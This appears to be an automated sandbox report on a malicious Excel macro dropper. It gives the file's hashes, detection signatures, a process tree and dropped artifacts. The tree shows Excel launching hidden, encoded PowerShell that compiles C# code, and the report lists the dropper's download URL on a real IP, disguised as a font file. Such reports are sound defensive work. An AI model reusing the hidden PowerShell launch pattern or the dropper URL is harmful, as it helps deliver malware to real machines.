Analysis

  • max time kernel: 47s
  • max time network: 36s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 13-11-2024 21:59

General

  • Target: 39c65059914e579c24ffa04024b2ea4f3568e52f622dc49160086afd01764a12.xls
  • Size: 46KB
  • MD5: 4c763330b1ec57574746ce178d9f21c2
  • SHA1: 9b8075d73f179184e756b20fb238a8cc8fc5a11a
  • SHA256: 39c65059914e579c24ffa04024b2ea4f3568e52f622dc49160086afd01764a12
  • SHA512: 0b3d039e3414c2a0ce3e449628003ea0cba8a5cf8c311a67edf742f4ba11d3b39ab5997451bd8b21bd0ecb3e66fdc7873340fac519634145307a8f98a31680ae
  • SSDEEP: 768:t4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:6SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (ps1.dropper): https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\39c65059914e579c24ffa04024b2ea4f3568e52f622dc49160086afd01764a12.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc 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
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA400.tmp" "c:\Users\Admin\AppData\Local\Temp\2tfg54oe\CSC87B6320ECF734F719C99E2F7FA7B1091.TMP"
          4⤵
          PID:2180


Downloads

  • C:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.dll
    Filesize: 3KB
    MD5: 1db3cddfd76f20c3ebe9efcd249c08ab
    SHA1: ae08d143470bf0670d62874be35f9c87599d444a
    SHA256: 8d31529513803ba546cbf51405bac7b15c747829a93af32bc3aae076c5d5fff6
    SHA512: 6fa995373ade65ac496dc821d19b7559b7f19f80f639fc7529ed79bef061d081fd96060c3c903b754d78d1eee0b8fa902c971d8941e9b35902b12e0bd3a492eb

  • C:\Users\Admin\AppData\Local\Temp\RESA400.tmp
    Filesize: 1KB
    MD5: abf00d3519c4805ed0506920b4fbc3d0
    SHA1: 17a245d54cc107ef9bad15844101076fbcfec2f6
    SHA256: d7cc8e0c72d8ded2927b3692eb68df8758a0205ed997df8e462786f38222b832
    SHA512: 715433056038cbda1dd659020acf9a1b202b263c044fc80cd1ef96f346339a925b2a70da2d5eaaf75d5ec31bc720e6b55964b9431784b6582c611e687d879fc6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggggxmdr.mxe.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize: 1KB
    MD5: 07528f0dc65ab406f8d1b737b8036feb
    SHA1: b352b0c99854acc0aed3059872ac061ed2c19bc5
    SHA256: c80b12b452b9713bbe88bb9a53d702585a4a8044f9573cc7183d5ca490eaebcb
    SHA512: acc76784e8ba3741c9209fa388507c258f4d82e976085619b2429df3a8ee12fcb5f86db9ae6c88afc6f6c44a107a2af4ac3219a38d23e797e5c253307f61a570

  • \??\c:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.0.cs
    Filesize: 631B
    MD5: f4dd5c682eb7b3b679f084261bfc7c4c
    SHA1: 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
    SHA256: 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
    SHA512: 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\2tfg54oe\2tfg54oe.cmdline
    Filesize: 369B
    MD5: 97f2b2defed4b6642ec630bd351d9479
    SHA1: 52011a1843452ee7773dd5c1d85cdf582271fb17
    SHA256: 79911b63f086de8439e5022cb13de7b248e1b864fedd958efaa7066694633761
    SHA512: c1921ac53f61df2e96fb5f204e0cf1db37ccf2eb223ac439f6d4a543743da0affee6d9cb6fe93387b306788b2b23c38d5c00bdbaabd857b68ca75ab10053d373

  • \??\c:\Users\Admin\AppData\Local\Temp\2tfg54oe\CSC87B6320ECF734F719C99E2F7FA7B1091.TMP
    Filesize: 652B
    MD5: 18be990fc2a56718102eee491690fdf2
    SHA1: db615692d116c962eca7ef67d0022f4964cbb879
    SHA256: 158c72ba8287bf4199af28c20102060a5b82a68f19ddbcfd97744edf204e09f0
    SHA512: cd5925e07b1f87501defc00dcaee1301152636c7251b2aa5b24981d55c294874dde64b679f180cfe65f93b276372f83b9565afedc4139e290d8c2b97f4cc5aaa

  • memory/1404-8-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-28-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-9-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-11-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-13-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-14-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp (Filesize: 64KB)
  • memory/1404-12-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-16-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-17-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp (Filesize: 64KB)
  • memory/1404-19-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-18-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-15-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-7-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp (Filesize: 64KB)
  • memory/1404-2-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp (Filesize: 64KB)
  • memory/1404-29-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-4-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp (Filesize: 64KB)
  • memory/1404-10-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-6-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-5-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-0-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp (Filesize: 64KB)
  • memory/1404-1-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp (Filesize: 64KB)
  • memory/1404-3-0x00007FFD547AD000-0x00007FFD547AE000-memory.dmp (Filesize: 4KB)
  • memory/1404-67-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-61-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-62-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/1404-66-0x00007FFD54710000-0x00007FFD54905000-memory.dmp (Filesize: 2.0MB)
  • memory/4992-57-0x000001F3AF0E0000-0x000001F3AF0E8000-memory.dmp (Filesize: 32KB)
  • memory/4992-44-0x000001F3C7330000-0x000001F3C7352000-memory.dmp (Filesize: 136KB)